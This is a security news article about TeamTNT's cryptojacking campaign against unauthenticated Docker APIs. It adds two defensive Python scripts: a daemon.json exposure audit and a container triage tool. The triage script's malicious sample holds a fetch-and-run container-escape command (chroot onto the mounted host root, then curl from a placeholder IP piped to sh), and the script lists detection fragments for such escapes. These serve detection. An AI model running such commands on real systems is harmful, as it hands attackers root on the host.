TeamTNT Targets Exposed Docker Servers for Cryptojacking

TeamTNT Recruits Docker Servers in New Cryptojacking Blitz

TeamTNT, an infamous cryptojacking group, is gearing up for a large-scale campaign targeting cloud-native environments. The group is known for exploiting exposed Docker daemons to mine cryptocurrency and to rent out compromised servers to third parties. According to a report by Assaf Morag, director of threat intelligence at Aqua, TeamTNT is using Docker Hub as the infrastructure to distribute its malware, including the Sliver command-and-control implant, a worm component, and cryptominers.

Datadog recently detected early signs of the campaign, which aims to compromise Docker environments and enroll them into a Docker Swarm under the attackers' control. The campaign centers on mass scanning for unauthenticated Docker API endpoints: the attacks are initiated by a script that probes the Docker API ports on millions of IP addresses, so any daemon listening on a TCP port without client-certificate authentication is effectively handing root on the host to whoever reaches it first.
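The exposure the scanners look for is a daemon listening on TCP without mutual TLS. The following audit is an added example, not code from the report, from Aqua or from Datadog. It reads the keys the Docker daemon accepts in `/etc/docker/daemon.json` (`hosts`, `tlsverify`, `tlscacert`, `tlscert`, `tlskey`); the two sample configurations are constructed, and 2375 and 2376 are Docker's documented default ports for the plaintext and TLS API respectively.

```python
"""Audit a Docker daemon configuration for the exposure TeamTNT scans for.

Added example: this is not code from the report, from Aqua or from
Datadog. It inspects the keys the Docker daemon accepts in
/etc/docker/daemon.json ("hosts", "tlsverify", "tlscacert", "tlscert",
"tlskey"). The two sample configurations below are constructed; 2375
and 2376 are Docker's documented default ports for the plaintext and
TLS API respectively.
"""
import json
from urllib.parse import urlparse

TLS_MATERIAL = ("tlscacert", "tlscert", "tlskey")
ALL_INTERFACES = {"", "0.0.0.0", "::"}


def audit_daemon_config(config: dict) -> list[str]:
    """Return findings for a parsed daemon.json; an empty list means no TCP exposure."""
    findings = []
    tcp_hosts = [h for h in config.get("hosts", []) if h.startswith("tcp://")]
    if not tcp_hosts:
        return findings  # unix:// or fd:// listeners only: not reachable over the network

    # Mutual TLS is only in force when tlsverify is set AND the cert material is configured.
    mutual_tls = bool(config.get("tlsverify")) and all(config.get(k) for k in TLS_MATERIAL)

    for host in tcp_hosts:
        bind = urlparse(host).hostname or ""
        if not mutual_tls:
            # An unauthenticated Docker API grants root on the host to anyone who reaches it.
            findings.append(f"{host}: TCP listener without tlsverify and client certificates")
        if bind in ALL_INTERFACES and not mutual_tls:
            findings.append(f"{host}: bound to every interface, the exposure mass scanners look for")
    return findings


def audit_daemon_json(text: str) -> list[str]:
    """Convenience wrapper for the raw contents of daemon.json."""
    return audit_daemon_config(json.loads(text))


# Constructed sample: the weak setting, a plaintext API on all interfaces.
WEAK_DAEMON_JSON = json.dumps({
    "hosts": ["unix:///var/run/docker.sock", "tcp://0.0.0.0:2375"],
})

# Constructed sample: the corrected setting, mutual TLS on one internal address.
HARDENED_DAEMON_JSON = json.dumps({
    "hosts": ["unix:///var/run/docker.sock", "tcp://10.0.0.5:2376"],
    "tlsverify": True,
    "tlscacert": "/etc/docker/ca.pem",
    "tlscert": "/etc/docker/server-cert.pem",
    "tlskey": "/etc/docker/server-key.pem",
})

if __name__ == "__main__":
    for label, text in (("weak", WEAK_DAEMON_JSON), ("hardened", HARDENED_DAEMON_JSON)):
        print(label, audit_daemon_json(text) or ["no findings"])
```

One caveat: the daemon can also be given listeners with `-H` on the `dockerd` command line (for example in a systemd unit), so check those arguments as well as the config file; the audit above only sees what is in `daemon.json`.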

Monetizing Compromised Servers for Crypto Mining

Once servers are compromised, TeamTNT uses them to mine cryptocurrencies such as Monero. In addition, the group rents the computational power of infected servers to other users through Mining Rig Rentals, a mining rental platform, a diversification that shows how mature its illicit business model has become. The group has also switched from the Tsunami backdoor to the open-source Sliver command-and-control framework, a move that demonstrates its ability to evolve its tactics.

Wider Threat to Cloud Security

The group's persistent attacks involve executing malicious commands through Docker containers and deploying an Alpine Linux image from a compromised Docker Hub account. These campaigns not only target cloud environments for crypto mining but also spread the group's payloads further, while using anonymous DNS (anondns) to hide its web servers.
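A defender who cannot trust every image on Docker Hub can still catch the pattern described above at the container level: a small image from an unfamiliar account started with host-level privileges and a command that breaks out onto the host. The following triage is an added example, not code from the report, Aqua or Datadog. The records mimic the shape of `docker inspect` output (`Config.Image`, `Config.Cmd`, `HostConfig.Privileged`, `HostConfig.PidMode`, `HostConfig.Binds`); the account name, IP address and script name in the malicious sample are constructed, not indicators from the campaign.

```python
"""Flag container definitions that match the container-escape pattern above.

Added example; not code from the report, Aqua or Datadog. The records
mimic the shape of `docker inspect` output (Config.Image, Config.Cmd,
HostConfig.Privileged, HostConfig.PidMode, HostConfig.Binds). The
account name, IP address and script name in the malicious sample are
constructed, not indicators from the campaign.
"""

TRUSTED_NAMESPACES = {"library"}  # official images such as "alpine" resolve to library/alpine
SENSITIVE_HOST_PATHS = {"/", "/etc", "/root", "/var/run/docker.sock"}
# Fragments typical of "run a payload on the host from inside a container".
SUSPICIOUS_CMD_FRAGMENTS = ("chroot /host", "nsenter", "| sh", "| bash")


def image_namespace(image: str) -> str:
    """Return the namespace of an image reference ("library" for official images)."""
    ref = image.split("@", 1)[0]                 # drop any digest
    head, sep, last = ref.rpartition("/")
    ref = head + sep + last.split(":", 1)[0]     # drop the tag from the last path component
    parts = ref.split("/")
    if len(parts) > 1 and ("." in parts[0] or ":" in parts[0] or parts[0] == "localhost"):
        parts = parts[1:]                        # leading component is a registry host
    return parts[0] if len(parts) > 1 else "library"


def assess_container(record: dict) -> list[str]:
    """Return findings for one inspect record; an empty list means nothing suspicious."""
    cfg = record.get("Config") or {}
    host = record.get("HostConfig") or {}
    findings = []

    image = cfg.get("Image", "")
    ns = image_namespace(image)
    if ns not in TRUSTED_NAMESPACES:
        findings.append(f"image {image!r} comes from untrusted namespace {ns!r}")
    if host.get("Privileged"):
        findings.append("container is privileged")
    if host.get("PidMode") == "host":
        findings.append("container shares the host PID namespace")
    for bind in host.get("Binds") or []:
        src = bind.split(":", 1)[0]
        if src in SENSITIVE_HOST_PATHS:
            findings.append(f"sensitive host path {src!r} is mounted into the container")
    cmd = " ".join(cfg.get("Cmd") or [])
    for frag in SUSPICIOUS_CMD_FRAGMENTS:
        if frag in cmd:
            findings.append(f"command contains {frag!r}")
    return findings


def scan(records: list[dict]) -> dict[str, list[str]]:
    """Map container Id to findings, keeping only containers with at least one."""
    return {r.get("Id", "?"): f for r in records if (f := assess_container(r))}


# Constructed sample: an Alpine image from a non-official account, privileged,
# host PID namespace, host root mounted, payload fetched and run via chroot.
MALICIOUS_CONTAINER = {
    "Id": "c0ffee01",
    "Config": {
        "Image": "docker.io/example-compromised-acct/alpine:latest",
        "Cmd": ["sh", "-c", "chroot /host sh -c 'curl -sL http://198.51.100.10/setup.sh | sh'"],
    },
    "HostConfig": {"Privileged": True, "PidMode": "host", "Binds": ["/:/host"]},
}

# Constructed sample: the official image, no privileges, a read-only data mount.
BENIGN_CONTAINER = {
    "Id": "beef0002",
    "Config": {"Image": "alpine:3.19", "Cmd": ["sleep", "300"]},
    "HostConfig": {"Privileged": False, "PidMode": "", "Binds": ["/srv/data:/data:ro"]},
}

if __name__ == "__main__":
    for cid, findings in scan([MALICIOUS_CONTAINER, BENIGN_CONTAINER]).items():
        print(cid, *findings, sep="\n  ")
```

In practice the records come from `docker inspect $(docker ps -aq)`, which prints a JSON array in exactly this shape; feed it to `scan()` and page on anything that combines an untrusted namespace with a privileged or host-mounted configuration.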

Cryptojacking remains lucrative for cybercriminals, who use compromised systems to mine digital currencies such as Monero without the victim's knowledge. It lets threat actors profit while staying under the radar, which underscores the need for better cloud security and monitoring to prevent such attacks.
